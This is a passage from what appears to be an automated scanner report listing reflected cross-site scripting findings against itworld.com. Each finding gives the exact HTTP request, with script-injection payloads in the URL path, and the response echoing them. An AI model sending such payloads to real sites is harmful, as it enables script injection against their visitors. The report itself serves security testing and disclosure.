s.prop45="/sites/all/modules/contrib95279"-alert(1)-"f226b924167/ctools/js/ajax-responder.js";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't find the page you r
...[SNIP]...

1.151. http://www.itworld.com/sites/all/modules/contrib/ctools/js/ajax-responder.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/ctools/js/ajax-responder.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1038"><script>alert(1)</script>6b484ebbda5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules/contribd1038"><script>alert(1)</script>6b484ebbda5/ctools/js/ajax-responder.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:22:35 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460155"
Content-Type: text/html; charset=utf-8
Content-Length: 57720
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:22:41 GMT
X-Varnish: 252446397
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/sites/all/modules/contribd1038"><script>alert(1)</script>6b484ebbda5/ctools/js/ajax-responder.js?h"/>
...[SNIP]...

1.152. http://www.itworld.com/sites/all/modules/contrib/ctools/js/ajax-responder.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/ctools/js/ajax-responder.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa41b"-alert(1)-"ae8ec55816b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/contrib/ctoolsaa41b"-alert(1)-"ae8ec55816b/js/ajax-responder.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:24:00 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460240"
Content-Type: text/html; charset=utf-8
Content-Length: 57504
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:24:06 GMT
X-Varnish: 252448493
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
gerich";
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites/all/modules/contrib/ctoolsaa41b"-alert(1)-"ae8ec55816b/js/ajax-responder.js";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't find the page you requeste
...[SNIP]...

1.153. http://www.itworld.com/sites/all/modules/contrib/ctools/js/ajax-responder.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/ctools/js/ajax-responder.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b8bb"><script>alert(1)</script>a9023d95d6d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules/contrib/ctools9b8bb"><script>alert(1)</script>a9023d95d6d/js/ajax-responder.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:23:23 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460203"
Content-Type: text/html; charset=utf-8
Content-Length: 57726
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:23:39 GMT
X-Varnish: 252447326
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/sites/all/modules/contrib/ctools9b8bb"><script>alert(1)</script>a9023d95d6d/js/ajax-responder.js?h"/>
...[SNIP]...

1.154. http://www.itworld.com/sites/all/modules/contrib/ctools/js/ajax-responder.js [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/ctools/js/ajax-responder.js

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cac2b"-alert(1)-"0a84c658c4a was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/contrib/ctools/js/ajax-responder.jscac2b"-alert(1)-"0a84c658c4a?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:25:21 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460321"
Content-Type: text/html; charset=utf-8
Content-Length: 57505
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:25:24 GMT
X-Varnish: 1038160213
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
08-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites/all/modules/contrib/ctools/js/ajax-responder.jscac2b"-alert(1)-"0a84c658c4a";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't find the page you requested.";
s.eVar13="CMS";

...[SNIP]...

1.155. http://www.itworld.com/sites/all/modules/contrib/ctools/js/modal.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/ctools/js/modal.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 883c7"-alert(1)-"b97a5e24e84 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites883c7"-alert(1)-"b97a5e24e84/all/modules/contrib/ctools/js/modal.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; mobify=0; __switchTo5x=56; __unam=dad84f1-13284325649-54133fa9-1; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D14%3B%20SC_LINKS%3Dhomepage%255E%255ECyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255Ehomepage%2520%257C%2520Cyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255E%3B%20s_sq%3Didgitworldcomprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run%252526ot%25253DA%3B; s_pers=%20s_pv%3Dhomepage%7C1316479993320%3B; __utma=222989251.1353402908.1316477884.1316477884.1316477884.1; __utmb=222989251; __utmc=222989251; __utmz=222989251.1316477884.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:28:28 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460508"
Content-Type: text/html; charset=utf-8
Content-Length: 57408
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:28:29 GMT
X-Varnish: 1038165906
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
s.prop13="CMS";
s.prop14="kgerich";
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites883c7"-alert(1)-"b97a5e24e84/all/modules/contrib/ctools/js/modal.js";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't find the
...[SNIP]...

1.156. http://www.itworld.com/sites/all/modules/contrib/ctools/js/modal.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/ctools/js/modal.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57388"><script>alert(1)</script>cc2cd84bd20 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites57388"><script>alert(1)</script>cc2cd84bd20/all/modules/contrib/ctools/js/modal.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; mobify=0; __switchTo5x=56; __unam=dad84f1-13284325649-54133fa9-1; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D14%3B%20SC_LINKS%3Dhomepage%255E%255ECyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255Ehomepage%2520%257C%2520Cyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255E%3B%20s_sq%3Didgitworldcomprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run%252526ot%25253DA%3B; s_pers=%20s_pv%3Dhomepage%7C1316479993320%3B; __utma=222989251.1353402908.1316477884.1316477884.1316477884.1; __utmb=222989251; __utmc=222989251; __utmz=222989251.1316477884.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:28:22 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460502"
Content-Type: text/html; charset=utf-8
Content-Length: 57628
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:28:23 GMT
X-Varnish: 1038165738
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/sites57388"><script>alert(1)</script>cc2cd84bd20/all/modules/contrib/ctools/js/modal.js?h"/>
...[SNIP]...

1.157. http://www.itworld.com/sites/all/modules/contrib/ctools/js/modal.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/ctools/js/modal.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca9f6"-alert(1)-"52c59f70c2f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/allca9f6"-alert(1)-"52c59f70c2f/modules/contrib/ctools/js/modal.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; mobify=0; __switchTo5x=56; __unam=dad84f1-13284325649-54133fa9-1; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D14%3B%20SC_LINKS%3Dhomepage%255E%255ECyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255Ehomepage%2520%257C%2520Cyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255E%3B%20s_sq%3Didgitworldcomprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run%252526ot%25253DA%3B; s_pers=%20s_pv%3Dhomepage%7C1316479993320%3B; __utma=222989251.1353402908.1316477884.1316477884.1316477884.1; __utmb=222989251; __utmc=222989251; __utmz=222989251.1316477884.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:28:42 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460522"
Content-Type: text/html; charset=utf-8
Content-Length: 57409
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:28:43 GMT
X-Varnish: 1038166213
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
op13="CMS";
s.prop14="kgerich";
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites/allca9f6"-alert(1)-"52c59f70c2f/modules/contrib/ctools/js/modal.js";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't find the pag
...[SNIP]...

1.158. http://www.itworld.com/sites/all/modules/contrib/ctools/js/modal.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/ctools/js/modal.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13134"><script>alert(1)</script>5925b401935 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all13134"><script>alert(1)</script>5925b401935/modules/contrib/ctools/js/modal.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; mobify=0; __switchTo5x=56; __unam=dad84f1-13284325649-54133fa9-1; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D14%3B%20SC_LINKS%3Dhomepage%255E%255ECyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255Ehomepage%2520%257C%2520Cyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255E%3B%20s_sq%3Didgitworldcomprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run%252526ot%25253DA%3B; s_pers=%20s_pv%3Dhomepage%7C1316479993320%3B; __utma=222989251.1353402908.1316477884.1316477884.1316477884.1; __utmb=222989251; __utmc=222989251; __utmz=222989251.1316477884.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:28:36 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460516"
Content-Type: text/html; charset=utf-8
Content-Length: 57629
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:28:37 GMT
X-Varnish: 1038166088
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/sites/all13134"><script>alert(1)</script>5925b401935/modules/contrib/ctools/js/modal.js?h"/>
...[SNIP]...

1.159. http://www.itworld.com/sites/all/modules/contrib/ctools/js/modal.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/ctools/js/modal.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39dd0"-alert(1)-"50c1f810567 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules39dd0"-alert(1)-"50c1f810567/contrib/ctools/js/modal.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; mobify=0; __switchTo5x=56; __unam=dad84f1-13284325649-54133fa9-1; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D14%3B%20SC_LINKS%3Dhomepage%255E%255ECyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255Ehomepage%2520%257C%2520Cyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255E%3B%20s_sq%3Didgitworldcomprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run%252526ot%25253DA%3B; s_pers=%20s_pv%3Dhomepage%7C1316479993320%3B; __utma=222989251.1353402908.1316477884.1316477884.1316477884.1; __utmb=222989251; __utmc=222989251; __utmz=222989251.1316477884.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:29:06 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460546"
Content-Type: text/html; charset=utf-8
Content-Length: 57408
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:29:12 GMT
X-Varnish: 1038167119
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
S";
s.prop14="kgerich";
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites/all/modules39dd0"-alert(1)-"50c1f810567/contrib/ctools/js/modal.js";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't find the page you re
...[SNIP]...

1.160. http://www.itworld.com/sites/all/modules/contrib/ctools/js/modal.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/ctools/js/modal.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc2a9"><script>alert(1)</script>f020999d5a4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modulesbc2a9"><script>alert(1)</script>f020999d5a4/contrib/ctools/js/modal.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run
